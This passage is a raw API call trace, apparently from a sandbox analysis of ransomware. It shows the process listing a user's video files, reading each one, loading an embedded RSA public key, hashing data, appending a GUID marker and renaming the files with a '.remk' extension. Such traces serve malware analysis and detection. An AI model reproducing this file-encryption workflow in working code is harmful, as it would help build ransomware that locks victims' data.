RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc900 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf018 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.873] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x15230, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x15230, lpOverlapped=0x0) returned 1 [0236.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.873] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15235, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.873] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.874] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.874] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.874] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.874] CloseHandle (hObject=0x640) returned 1 [0236.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0236.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0236.878] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\WuazV8l9ZPKR2hR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xq9ey6lncw89esh\\wuazv8l9zpkr2hr.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\WuazV8l9ZPKR2hR.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xq9ey6lncw89esh\\wuazv8l9zpkr2hr.flv.remk")) returned 1 [0236.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.888] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0236.889] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6524e090, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0xf5a56600, ftLastAccessTime.dwHighDateTime=0x1d5e16d, ftLastWriteTime.dwLowDateTime=0xf5a56600, ftLastWriteTime.dwHighDateTime=0x1d5e16d, nFileSizeHigh=0x0, nFileSizeLow=0x15235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WuazV8l9ZPKR2hR.flv", cAlternateFileName="WUAZV8~1.FLV")) returned 0 [0236.889] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0236.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0236.889] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0236.889] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\") returned="ZCC-nq6c5y\\" [0236.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0236.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0236.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0236.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.891] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.891] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.891] PathFindFileNameW (pszPath="") returned="" [0236.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed3ec350, ftCreationTime.dwHighDateTime=0x1d5e4b3, ftLastAccessTime.dwLowDateTime=0xf91dfa20, ftLastAccessTime.dwHighDateTime=0x1d5dc0b, ftLastWriteTime.dwLowDateTime=0xf91dfa20, ftLastWriteTime.dwHighDateTime=0x1d5dc0b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0236.894] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed3ec350, ftCreationTime.dwHighDateTime=0x1d5e4b3, ftLastAccessTime.dwLowDateTime=0xf91dfa20, ftLastAccessTime.dwHighDateTime=0x1d5dc0b, ftLastWriteTime.dwLowDateTime=0xf91dfa20, ftLastWriteTime.dwHighDateTime=0x1d5dc0b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.894] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92799e70, ftCreationTime.dwHighDateTime=0x1d5e168, ftLastAccessTime.dwLowDateTime=0xf4f294d0, ftLastAccessTime.dwHighDateTime=0x1d5e55f, ftLastWriteTime.dwLowDateTime=0xf4f294d0, ftLastWriteTime.dwHighDateTime=0x1d5e55f, nFileSizeHigh=0x0, nFileSizeLow=0x60ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4vcFIzQn6R7Uez.mp4", cAlternateFileName="4VCFIZ~1.MP4")) returned 1 [0236.895] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\4vcFIzQn6R7Uez.mp4") returned=".mp4" [0236.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\4vcFIzQn6R7Uez.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\4vcfizqn6r7uez.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.896] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=24750) returned 1 [0236.896] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.899] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6088, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.899] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.900] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x60ae, lpOverlapped=0x0) returned 1 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.901] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.902] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.903] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.903] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.903] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.903] GetLastError () returned 0x0 [0236.903] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.903] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.903] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.903] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.903] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.903] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.904] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x60ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.904] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.904] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.904] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.904] CloseHandle (hObject=0x640) returned 1 [0236.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0236.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0236.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0236.906] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\4vcFIzQn6R7Uez.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\4vcfizqn6r7uez.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\4vcFIzQn6R7Uez.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\4vcfizqn6r7uez.mp4.remk")) returned 1 [0236.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.908] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0236.909] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1379b040, ftCreationTime.dwHighDateTime=0x1d5e589, ftLastAccessTime.dwLowDateTime=0x1b371c00, ftLastAccessTime.dwHighDateTime=0x1d5e4f3, ftLastWriteTime.dwLowDateTime=0x1b371c00, ftLastWriteTime.dwHighDateTime=0x1d5e4f3, nFileSizeHigh=0x0, nFileSizeLow=0x1033b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9L8GIzDkh2buC.mp4", cAlternateFileName="9L8GIZ~1.MP4")) returned 1 [0236.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0236.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\9L8GIzDkh2buC.mp4") returned=".mp4" [0236.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\9L8GIzDkh2buC.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\9l8gizdkh2buc.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.910] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=66363) returned 1 [0236.910] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.912] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10315, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.912] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.914] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.914] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1033b, lpOverlapped=0x0) returned 1 [0236.916] lstrlenA (lpString="-----BEGIN PUBLIC 